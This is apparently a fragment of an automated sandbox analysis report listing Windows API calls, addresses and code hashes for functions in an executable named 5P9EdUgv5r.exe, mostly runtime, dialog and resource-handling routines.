                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Time$File$System$Local$SpecificVersion
                                • String ID:
                                • API String ID: 2092733347-0
                                • Opcode ID: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                                • Instruction ID: 14fce58203a712297c9f764f5d0c60112c7402f9039dcd74c5e5499f89270c92
                                • Opcode Fuzzy Hash: cda96ba12f147dd5d4dd3a4918f39060b45d7ee8041a77b11ea997620346a195
                                • Instruction Fuzzy Hash: 6631C67A90020AEBCB10DFE5D8859EFBBBCFF58700B04455AE959E3610E730AA45CB75
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                                • Instruction ID: 01c5d12b83af5666628fb9dd2b3930ee1a64bd07c3893d033399f1255c7dd171
                                • Opcode Fuzzy Hash: ac245c3e15898c35e9b4fdd3e0b19754c739d500de77432ccade97dba745bcd0
                                • Instruction Fuzzy Hash: CD21817260020EBBDB15AB20DC91E2BB7ADEB51784B54C129FC4D9A206F270ED4587B4
                                APIs
                                • GetLastError.KERNEL32(?,00DA0EE8,00D83E14,00DA0EE8,?,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D88FA9
                                • _free.LIBCMT ref: 00D88FDC
                                • _free.LIBCMT ref: 00D89004
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89011
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D8901D
                                • _abort.LIBCMT ref: 00D89023
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$_free$_abort
                                • String ID:
                                • API String ID: 3160817290-0
                                • Opcode ID: 6e8e4f9225fdd9aba4e844363320fb3031493f7f97d6c04baf2914a1503a43a6
                                • Instruction ID: a4ef3c61c22eb30f795148dbe837b7956e18becf4bc8d274b8238a5d65c7a325
                                • Opcode Fuzzy Hash: 6e8e4f9225fdd9aba4e844363320fb3031493f7f97d6c04baf2914a1503a43a6
                                • Instruction Fuzzy Hash: E1F02236504B116AC22277286C0AF3B2B2ADFC1761F6C011AF659E2296EF20CD02B335
                                APIs
                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D2F2
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7D30C
                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7D31D
                                • TranslateMessage.USER32(?), ref: 00D7D327
                                • DispatchMessageW.USER32(?), ref: 00D7D331
                                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D7D33C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                • String ID:
                                • API String ID: 2148572870-0
                                • Opcode ID: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                                • Instruction ID: d20bb52081f12802cf3340757c17bb8117396e9db3cc24f9df5413a8b8f5485a
                                • Opcode Fuzzy Hash: 752ce509fdae00c3ccb6aa702859ff916c8821f37127ed0f48fc874e2bf77393
                                • Instruction Fuzzy Hash: 38F0EC72A0121AABCB205BA5DC4CEEBBF7EEF527A1F048012F64AD2150E6359541D7F1
                                APIs
                                • _wcschr.LIBVCRUNTIME ref: 00D7C435
                                  • Part of subcall function 00D717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D6BB05,00000000,.exe,?,?,00000800,?,?,00D785DF,?), ref: 00D717C2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CompareString_wcschr
                                • String ID: <$HIDE$MAX$MIN
                                • API String ID: 2548945186-3358265660
                                • Opcode ID: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                                • Instruction ID: cddcdfff26dbbffab27b6530e3cd9a0af4e9afce998b8a65d85611a3797203f0
                                • Opcode Fuzzy Hash: 296d305e4db53870c4e630c75d4cade76b5bdbeb3ea9d31f936065aefabe3fbe
                                • Instruction Fuzzy Hash: 69318076910609AEDF25DA54DC51EEE77BCEB54304F0080AAFA0DD6190FBB19AC48B70
                                APIs
                                • LoadBitmapW.USER32(00000065), ref: 00D7ADFD
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00D7AE22
                                • DeleteObject.GDI32(00000000), ref: 00D7AE54
                                • DeleteObject.GDI32(00000000), ref: 00D7AE77
                                  • Part of subcall function 00D79E1C: FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                                  • Part of subcall function 00D79E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                                  • Part of subcall function 00D79E1C: LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                                  • Part of subcall function 00D79E1C: LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                • String ID: ]
                                • API String ID: 142272564-3352871620
                                • Opcode ID: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                                • Instruction ID: 3f7aa01555fdc72ffdc2dc26a5d70ed91bc273553177edade2e71a2bcbe17aa6
                                • Opcode Fuzzy Hash: 35e6dc4fc9eb043d3c2b51b8d19b4ad318d5145e06010545b9193a033bb53c7e
                                • Instruction Fuzzy Hash: F401C433640316A6C71067689C16E7FBB6AEBC1B52F088015FD08E7291EA718C1596B2
                                APIs
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                • EndDialog.USER32(?,00000001), ref: 00D7CCDB
                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D7CCF1
                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D7CD05
                                • SetDlgItemTextW.USER32(?,00000068), ref: 00D7CD14
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ItemText$DialogWindow
                                • String ID: RENAMEDLG
                                • API String ID: 445417207-3299779563
                                • Opcode ID: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                                • Instruction ID: 681e6dfd1703c0f329b4772ded3b322555ab757683c14ac7c8d13a11dd004106
                                • Opcode Fuzzy Hash: 4b5da50913fbc1179fd6569e54576b1f6b0b8c44478a681c58398049e44c428f
                                • Instruction Fuzzy Hash: 13019C33294312BFD2224F259C08FA73B5CEB4A702F148019F38EE21E1D7A19804C731
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D875E2
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D875F5
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00D87573,00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002), ref: 00D87618
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                                • Instruction ID: 4075cd9c47e8252c1a622f0fe22624170a4ab56496ad7981352e1fe800178794
                                • Opcode Fuzzy Hash: a324c1eac8556319c5823ad9c4c9c56697a0725d9ee8fc179b9d4811a632cb21
                                • Instruction Fuzzy Hash: F4F04430A0461CBBDB15AF54DC0AB9DBFB9EF04715F14416AF809E2260EB318E44CB74
                                APIs
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D6EB92
                                • GetProcAddress.KERNEL32(00DA81C0,CryptUnprotectMemory), ref: 00D6EBA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                • API String ID: 2141747552-1753850145
                                • Opcode ID: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                                • Instruction ID: 156a39994be617e21082af6f2ffd6e6b7970c1446ab25fa66627276f0493932f
                                • Opcode Fuzzy Hash: 1397f57098561922d725ddd8ea0bcd655dbcd9d20d4dc89aaeb6e39210ec2366
                                • Instruction Fuzzy Hash: ADE04678800751AFCF209F3D9808B42BFE4AB14710B04C81EE4DAE3280EAB5D5888F70
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                                • Instruction ID: a26ea2aa57907dac0bc7edceb1f6e1d83abe4507eda251acc7f56da3c284774e
                                • Opcode Fuzzy Hash: 0a433a998a3126ee3a88e58039c96b57fcd84a2782a67e8663c6a4ad8dd293a0
                                • Instruction Fuzzy Hash: D441A332A003049FDB25EF78C881A5EB7B6EF89714F6545A9E515EB341EB31ED01CBA0
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 00D8B619
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8B63C
                                  • Part of subcall function 00D88518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D8C13D,00000000,?,00D867E2,?,00000008,?,00D889AD,?,?,?), ref: 00D8854A
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D8B662
                                • _free.LIBCMT ref: 00D8B675
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D8B684
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                                • Instruction ID: 92e238de642403accd595decf680bec1ba5bf7d963aaf6d5e785ba89cde9803b
                                • Opcode Fuzzy Hash: d022cc88dc3975812c7f290c016deda6878cc55d015ac5b35a48af3d4f1dd831
                                • Instruction Fuzzy Hash: 650175A2601715BB632126B65C49C7B6A6DDEC6BB1319022BB904D6210EF60CD0192B4
                                APIs
                                • GetLastError.KERNEL32(?,?,?,00D8895F,00D885FB,?,00D88FD3,00000001,00000364,?,00D83713,00000050,?,00DA0EE8,00000200), ref: 00D8902E
                                • _free.LIBCMT ref: 00D89063
                                • _free.LIBCMT ref: 00D8908A
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D89097
                                • SetLastError.KERNEL32(00000000,?,00DA0EE8,00000200), ref: 00D890A0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: f98a27060bf5ae7744c59bc3cb283f6e8f0efee186c7ef32c0fc849daaed72a2
                                • Instruction ID: 080bea547649883323336b90d84bfa12bb5b89632be34a115edf02345160af78
                                • Opcode Fuzzy Hash: f98a27060bf5ae7744c59bc3cb283f6e8f0efee186c7ef32c0fc849daaed72a2
                                • Instruction Fuzzy Hash: 9601F476505B006A93227B396C96E3BA76EDBC137172C012AF589D2392EF61CC016370
                                APIs
                                  • Part of subcall function 00D70A41: ResetEvent.KERNEL32(?), ref: 00D70A53
                                  • Part of subcall function 00D70A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00D70A67
                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00D7078F
                                • CloseHandle.KERNEL32(?,?), ref: 00D707A9
                                • DeleteCriticalSection.KERNEL32(?), ref: 00D707C2
                                • CloseHandle.KERNEL32(?), ref: 00D707CE
                                • CloseHandle.KERNEL32(?), ref: 00D707DA
                                  • Part of subcall function 00D7084E: WaitForSingleObject.KERNEL32(?,000000FF,00D70A78,?), ref: 00D70854
                                  • Part of subcall function 00D7084E: GetLastError.KERNEL32(?), ref: 00D70860
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                • String ID:
                                • API String ID: 1868215902-0
                                • Opcode ID: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                                • Instruction ID: 6390b166a34c2e5d336d49015376f2b3d3a535cf3b4ed7f632a1de1dffd0f67a
                                • Opcode Fuzzy Hash: 0a819dd551641b590d091efcca18852ae51a343db6f68b8e993f970e0b0778ca
                                • Instruction Fuzzy Hash: 24015E72540704EFCB229F69DD85F86BBE9FB49710F00452AF16E822A4DB756A44CBB0
                                APIs
                                • _free.LIBCMT ref: 00D8BF28
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D8BF3A
                                • _free.LIBCMT ref: 00D8BF4C
                                • _free.LIBCMT ref: 00D8BF5E
                                • _free.LIBCMT ref: 00D8BF70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                                • Instruction ID: 44d1bf2554cfa37d23cd3a5bb42f2da04a0c792b9fb9d18c48a672a6d95f6a01
                                • Opcode Fuzzy Hash: 26242d9ebfd96779cf651a062f13f20a7438bbb1893404d1c7b85766449d35e0
                                • Instruction Fuzzy Hash: 57F0AF73508205AB8620FB68EE86C1A77DAFE047607A84806F549D7A55CF35FC819BB4
                                APIs
                                • _free.LIBCMT ref: 00D8807E
                                  • Part of subcall function 00D884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?), ref: 00D884F4
                                  • Part of subcall function 00D884DE: GetLastError.KERNEL32(?,?,00D8BFA7,?,00000000,?,00000000,?,00D8BFCE,?,00000007,?,?,00D8C3CB,?,?), ref: 00D88506
                                • _free.LIBCMT ref: 00D88090
                                • _free.LIBCMT ref: 00D880A3
                                • _free.LIBCMT ref: 00D880B4
                                • _free.LIBCMT ref: 00D880C5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                                • Instruction ID: 3fee461336e5da61cdc9c96908afee0cab5454a41c6dc1abc84e3ef2abf8a095
                                • Opcode Fuzzy Hash: 08e845c3b654f8f1526de8e0b020c7c4b8ea291eea4e35abb0a58479f904fc22
                                • Instruction Fuzzy Hash: A5F0177E8013378B9711BB19BC028197B66F716720348470AF410D6B72CB310861AFF5
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5P9EdUgv5r.exe,00000104), ref: 00D876FD
                                • _free.LIBCMT ref: 00D877C8
                                • _free.LIBCMT ref: 00D877D2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Users\user\Desktop\5P9EdUgv5r.exe
                                • API String ID: 2506810119-2748917032
                                • Opcode ID: cdece0b76f775a5b0c1ae4a889fd73734ed258dd12913622477d01c2356b1240
                                • Instruction ID: b5ab592ec0b6392d82eee76fb0dbab2e31cd05afb875d2a813e966dedcb4f84e
                                • Opcode Fuzzy Hash: cdece0b76f775a5b0c1ae4a889fd73734ed258dd12913622477d01c2356b1240
                                • Instruction Fuzzy Hash: 63315C75A04219AFDB21FB999D81DAEBBECEB85710F284066E80497211D6708E40DBB0
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D67579
                                  • Part of subcall function 00D63B3D: __EH_prolog.LIBCMT ref: 00D63B42
